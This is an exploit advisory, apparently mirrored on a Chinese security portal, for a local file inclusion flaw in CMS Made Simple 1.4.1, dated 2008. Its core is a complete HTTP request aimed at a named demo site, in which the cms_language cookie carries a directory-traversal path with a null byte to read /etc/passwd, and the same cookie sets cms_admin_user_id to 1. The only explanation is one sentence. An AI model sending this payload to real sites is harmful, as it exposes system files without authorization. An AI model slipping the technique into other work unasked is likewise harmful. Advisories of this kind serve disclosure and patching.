CMS Made Simple 1.4.1 Local File Inclusion Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

CMS Made Simple 1.4.1 Local File Inclusion Vulnerability

来源：vfocus.net 作者：vfocus 发布时间：2008-12-01

Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
Vendor: CMS Made Simple
Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
Author: M4ck-h@cK
Date 29.11.2008
Home: sweet home
contact: no, thx :)

Exploit:


Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]

GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: demo.cmsmadesimple.fr
Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
Connection: Close
Pragma: no-cache

It's possible to set "cms_language" value in order to view /etc/passwd file.

# [2008-11-29]

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告